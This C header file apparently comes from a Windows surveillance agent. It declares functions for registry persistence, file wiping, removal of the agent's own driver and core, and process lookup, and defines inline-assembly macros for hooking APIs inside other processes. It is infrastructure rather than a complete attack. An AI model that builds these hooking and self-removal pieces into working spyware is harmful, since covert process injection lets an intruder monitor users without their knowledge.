#include #include #include "HM_SafeProcedures.h" #define DLLNAMELEN (_MAX_PATH + 1) // XXX Posso allungarlo per directory widechar... #define STUB_SIZE 24 #define REDIR_SIZE 5 #define MARK_SEARCH_LIMIT 20 // Numero di byte in cui cerca il marker di un hook #define HMINBUNDLEHOOKS 0 #define MAXVIRTUALHOOK 1 #define HMSCREATEHOOK "HM_sCreateHookA" #define IFDEF(x) if(x != NULL) #define VALIDPTR(x) if(!(x)) return 1; // Usata per HM_GetDate typedef struct { DWORD lo_delay; DWORD hi_delay; } nanosec_time; // Funzioni esportate extern void HM_InsertRegistryKey(char *, BOOL); extern char *HM_CompletePath(char *, char *); extern WCHAR *HM_CompletePathW(WCHAR *, WCHAR *); extern void HM_WipeFileA(char *); extern void HM_WipeFileW(WCHAR *); extern void HM_RemoveRegistryKey(void); extern void HM_RemoveDriver(); extern void HM_RemoveCore(void); extern BOOL HM_GetDefaultBrowser(char *); extern BOOL HM_GetIE32Browser(char *path_name); extern void HM_U2A(char *); extern void HM_A2U(char *src, char *dst); extern char *HM_memstr(char *, char *); extern char *HM_FindProc(DWORD); extern WCHAR *HM_FindProcW(DWORD); extern DWORD HM_FindPid(char *, BOOL); extern HWND HM_GetProcessWindow(char *procname); extern BOOL HM_CheckNewConf(char *); extern BOOL HM_GetDate(nanosec_time *); extern char *HM_ReadClearConf(char *); extern BOOL HM_ExpandStrings(char *source, char *dest, DWORD dsize); extern BOOL HM_ExpandStringsW(WCHAR *source, WCHAR *dest, DWORD dsize); extern BOOL GetUserUniqueHash(BYTE *user_hash, DWORD hash_size); extern void IndirectCreateProcess(char *cmd_line, DWORD flags, STARTUPINFO *si, PROCESS_INFORMATION *pi, BOOL inherit); extern void HM_CalcDateDelta(long long, nanosec_time *); extern void *memmem (const void *haystack, size_t haystack_len, const void *needle, size_t needle_len); extern BOOL HM_TimeStringToFileTime(const WCHAR *time_string, FILETIME *ftime); extern BOOL IsLastInstance(); extern BOOL HM_HourStringToMillisecond(const WCHAR *time_string, DWORD *millisecond); BOOL FindModulePath(char *, DWORD); char *GetDosAsciiName(WCHAR *orig_path); // Dichiarata in HM_CrisisAgent.h extern BOOL IsCrisisNetwork(void); extern BOOL IsCrisisSystem(void); // Viene usata anche dagli event handlers delle date extern nanosec_time date_delta; // Usato per eventuali aggiustamenti sulla lettura delle date // Tpi delle funzioni importate dinamicamente..... // typedef BOOL (__stdcall *FreeLibrary_T) (HMODULE); typedef FARPROC (__stdcall *GetProcAddress_T) (HMODULE, LPCSTR); typedef HINSTANCE (__stdcall *LoadLibrary_T) (LPCTSTR); typedef DWORD (__stdcall *ResumeThread_T)(HANDLE); typedef HANDLE (__stdcall *OpenThread_T)(DWORD,BOOL,DWORD); typedef BOOL (__stdcall *CloseHandle_T)(HANDLE); typedef int (__cdecl *atoi_t) (const char *); typedef void (__cdecl *memcpy_t)(void *,const void *,size_t); ///////////////////////////////////////////////////////////////// // // Strutture Globali // ///////////////////////////////////////////////////////////////// // // Services struct // typedef BOOL (__stdcall *HM_IPCClientWrite_t) (DWORD, BYTE *, DWORD, DWORD, DWORD); typedef BYTE * (__stdcall *HM_IPCClientRead_t) (DWORD); typedef DWORD (__stdcall *HM_sCreateHook_t) (DWORD,char*,char*,BYTE*,DWORD,BYTE*,DWORD); typedef HANDLE (__stdcall *HM_sStartHookingThread_t)(DWORD,DWORD,BOOL,BOOL); typedef struct { HM_IPCClientWrite_t pHM_IpcCliWrite; HM_IPCClientRead_t pHM_IpcCliRead; DWORD PARAM[10]; }HMServiceStruct; // // struct comune di ogni datastruct degli Hook // [HMCommonDataStruct pCommon] /*COMMONDATA * char OriginalCode[STUB_SIZE]; // Stub che contiene il primo pezzo dell'Api * DWORD dwHookLen; // Lunghezza dell'Hook * DWORD dwHookAdd; // Indirizzo dell'Hook * DWORD dwDataAdd; // Indirizzo dei dati utiilzzati dall'Hook * BYTE *bAPIAdd; // Indirizzo API da Hookare * GetProcAddress_T _GetProcAddress; * LoadLibrary_T _LoadLibrary * FreeLibrary_T _FreeLibrary */ #define COMMONDATA char OriginalCode[STUB_SIZE];DWORD dwHookLen;DWORD dwHookAdd;DWORD dwDataAdd;BYTE *bAPIAdd;GetProcAddress_T _GetProcAddress;LoadLibrary_T _LoadLibrary;FreeLibrary_T _FreeLibrary;HM_IPCClientWrite_t pHM_IpcCliWrite;HM_IPCClientRead_t pHM_IpcCliRead typedef struct {COMMONDATA;} HMCommonDataStruct; void __stdcall HM_CreateProcess(char *, DWORD, STARTUPINFO *, PROCESS_INFORMATION *, DWORD); void __stdcall HM_CreateProcessAsUser(char *, DWORD, STARTUPINFO *, PROCESS_INFORMATION *, DWORD, HANDLE); //////////////////////////////////////////////////////////////////////////////////////// //////////////////////////////////////////////////////////////////////////////////////// // // Definizioni macro per gli Hooks // //////////////////////////////////////////////////////////////////////////////////////// //////////////////////////////////////////////////////////////////////////////////////// DWORD __stdcall HM_sCreateHookA(DWORD, char *, char *, BYTE *, DWORD, BYTE *, DWORD ); typedef DWORD (__stdcall *HM_CreateHook_t)(DWORD, HMServiceStruct *, BOOL); typedef DWORD (__stdcall *HM_CreateService_t)(DWORD, HMServiceStruct *); // Indispensabili per gli Hooks #define INIT_WRAPPER(STRTYPE) STRTYPE *pData = NULL; \ __asm MOV EBX,69696969h \ __asm MOV DWORD PTR SS:[pData], EBX \ // Marca gli hook con delle jump all'istruzione successiva #define MARK_HOOK __asm _emit 0xEB \ __asm _emit 0x00 \ __asm _emit 0xEB \ __asm _emit 0x00 #define CALL_ORIGINAL_API(ARGS_N) DWORD ret_code = 0; \ __asm MOV EBX, DWORD PTR SS:[pData] \ __asm LEA ESI, DWORD PTR SS:[EBP+8] \ __asm MOV EDI, ARGS_N \ __asm SHL EDI, 2 \ __asm SUB ESP, EDI \ __asm MOV EDI, ESP \ __asm MOV ECX, ARGS_N \ __asm REP MOVSD \ __asm CALL EBX \ __asm MOV DWORD PTR SS:[ret_code], EAX #define CALL_ORIGINAL_API_SEQ(ARGS_N) __asm MOV EBX, DWORD PTR SS:[pData] \ __asm LEA ESI, DWORD PTR SS:[EBP+8] \ __asm MOV EDI, ARGS_N \ __asm SHL EDI, 2 \ __asm SUB ESP, EDI \ __asm MOV EDI, ESP \ __asm MOV ECX, ARGS_N \ __asm REP MOVSD \ __asm CALL EBX \ __asm MOV DWORD PTR SS:[ret_code], EAX #define IF_WSTRCMP(x,y) BOOLEAN is_equal;\ is_equal = TRUE;\ if (x) {\ DWORD i = 0;\ do {\ if (x[i*2] != pData->y[i]) {\ is_equal = FALSE;\ break;\ }\ } while (pData->y[i++]);\ } else is_equal = FALSE;\ if (is_equal) #define IF_LSTRCMP(x,y,z) BOOLEAN is_equal;\ is_equal = TRUE;\ if (x) {\ DWORD i = 0;\ while(pData->y[i]) {\ if (i>=z) { \ is_equal = FALSE;\ break;\ } \ if (x[i*2] != pData->y[i]) {\ is_equal = FALSE;\ break;\ }\ i++; \ }\ if (i!=z) is_equal = FALSE; \ } else is_equal = FALSE;\ if (is_equal) #define HMMAKE_HOOK(DWPID, APINAME, HOOKADD, HOOKDATA, SETUPADD, OPTPARAM, DLLNAME) (SETUPADD(OPTPARAM) ? 0 : \ HM_sCreateHookA(DWPID, APINAME, DLLNAME, (BYTE *)HOOKADD, HOOKDATA.dwHookLen, (BYTE *)&HOOKDATA, sizeof(HOOKDATA))); HANDLE GetMediumLevelToken(); .